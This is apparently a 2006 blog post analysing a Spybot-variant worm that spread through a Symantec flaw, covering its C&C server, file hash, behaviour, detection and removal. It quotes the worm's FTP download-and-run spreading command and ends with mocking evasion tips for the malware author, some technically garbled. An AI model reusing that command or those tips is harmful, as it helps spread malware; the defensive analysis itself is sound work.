Author: |sid| (efnet)
In late November, security reports indicated a new worm was spreading through our network, taking advantage of a vulnerability in Symantec’s anti-virus/computer security products. The vulnerability, which effected a variety of Symantec's products, was discovered or made public in May, 2006. The weakness allowed an attacker to execute code remotely on fully patched Windows 2000 and Windows XP machines. A lead security specialist from eEYE reported malicious individuals were actively exploiting the weakness to gain control of machines for use in botnets. Once a machine was infected, the Trojan called home to IP address, 38.118.143.201. The first compromised machine immediately began scanning other machines on the same subnet. We had already observed an instance of the scanning on the [removed] campus via a wireless DHCP host. The IP was quickly blocked, however, quite a few machines had already been infected.
The security team decided to take a look at the new worm and see what was under the hood. They obtained one of the infected machines from a faculty member and placed it in a controlled test environment. The test environment included a single Dell Optiplex GX620. The machine had Windows 2003 server installed and was setup to run 50 virtual machines, 5 of which were used to run various services like: Exchange, DNS, DHCP. The remaining 45 acted as typical XP work stations, all with unpatched version of Symantec's Security Suite installed (Windows can be fully patched, the SAV is what needs to be patched). The faculty member's infected machine and the GX620 were connected using a simple Netgear 4 port 10/100Mbps Switch.
This mock network was setup in an effort to monitor the worm in a production environment, to see what its capabilities were, and to analyze the bot's procedures as programmed by the author. The worm quickly spread throughout the virtual environment, and within fifteen to twenty minutes, had successfully installed an IRC bot on every machine. The next step was to figure out the inner workings of the worm and the bot that came with it. Using some common security tools, such as, Ethereal, Soft ICE, and a little Perl scripting, the security team was able to come up with the following:
www.flackware.info as the Command and Control. Here is information that I know so far:
========= Command and Control ===================
. www.flackware.info:6667/tcp (the only apparent name/port used) . (auto)JOIN #text airforce
========= File Info =========
"MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f . w32svc.exe is 1.12 MB (1,182,208 bytes) (MASSIVE for a bot!)"
Symantec definitions 11/27/2006 rev.50 and later will detect it as a Spybot variant
============= How to Obtain =============
The bot uses a build-in FTP server ("Reptile", a.k.a. "StnyFTPd") to spread. When it compromises a machine, it executes the following commands:
echo open (ip address of attacker) (ftp server port) > i echo user 1 1 >> i echo get w32svc.exe >> i echo quit >> i ftp -As:i w32svc.exe exit
======== When Run ========
"Installs itself to %WINDIR%w32svc.exe"
Sets Windows File Protection to "Scan only at bootup"
Moves ftp.exe and tftp.exe to %WINDIR%System32Microsoftackup.ftp and backup.tftp
Drops a new ftp.exe and tftp.exe to %WINDIR%System32
Attempts to connect to the Command and Control server
Installs itself as a service in many places within the registry
======== Infection Vectors ========
"Almost certainly via SYM06-010"
Almost certainly other Windows vulnerabilities (since patched)
======== Detecting Infections - Network ========
"Looking for DNS queries for www.flackware.info"
Looking for network traffic to port 6667/tcp going to the IP address for www.flackware.info
Looking for scanning (more than 3-4 destinations) on port 2967/tcp
======== Identifying Infection - At the Computer ========
"Look for %WINDIR%w32svc.exe"
Look for a Service called "Windows Network Firewall"
======= Removal =======
Symantec definitions 11/27/2006 rev.50 performed admirably on my test box. Assuming the host did not have any other malware loaded onto it after infection, updating the AV defs to that "rev" or later, scanning the hard drive, then rebooting when prompted should do the trick. Manual Removal: Set the "Windows Network Firewall" service to "Disabled", and reboot (you can't stop the service while it is running). Delete the w32svc.exe file, and preferably, remove the associated (dozens of) registry keys.
After a thorough analysis, the guys decided to join the flackware.info IRC server, since the IRCd was using the typical unencrypted port, 6667. After connecting to the server and joining the channel stated above, the guys were in an empty channel with an encrypted topic used to give further instructions to the bot. The encryption scheme was decrypted within forty-five minutes with “On The Spot” Perl script, due to what one member of the team called “week encryption efforts.”
The now decrypted topic was a simple command to join another IRC server. After following the topic's instructions, they were not surprised to be given the same scenario, an empty channel and an encrypted topic. Discovering the algorithm streamlined the team's ability to quickly proceed through the poorly encrypted topics. This process continued through a total of sixteen servers. Finally, after hitting the sixteenth server, the topic instructed the bot(s) to connect to an FTP site where 2 spy ware applications were available for download. One for Viagra, and another for a five day cruise. The sixteen servers were all compromised machines from a variety of countries, all running a custom IRCd, and needless to say, the FTPd mentioned above.
Chances are, some 13 year old kid in the Ukraine went through the trouble of carelessly configuring/modifying SpyBot source code, compromising sixteen servers, installing unencrypted IRC & FTP daemons, and scanning huge IP blocks just to install spy ware on unpatched machines. All of this for porbably a measly $0.50 per install. Had the kid stripped out the useless and/or unnecessary code to reduce the overall size of the bot, encrypted the executable itself with something stronger than MD5, and encrypted his IRCd & FTPd connections, we might have been impressed.
And Kid, if you end up reading this, next time try a tool called redeye to encrypt your executable. 256 bit SAHW2 > MD5 any day of the week. Also, encrypt your traffic by setting up daemons that support SSL connections, and don't use the default ports (duh).
-- |sid|
(editing by: admin - feel free to contact |sid|, root [-at-] darkfiber.ws for an original copy)
Word Count: 1077
Tags: botnet, IRC, malicious, malware, rootkit, tcp/ip, Windows XP, worm
2 (Comments|Trackbacks)
[ RSS feed | Trackback URI | Leave a Comment ]
Leave a Comment
Trackback Responses to This Post: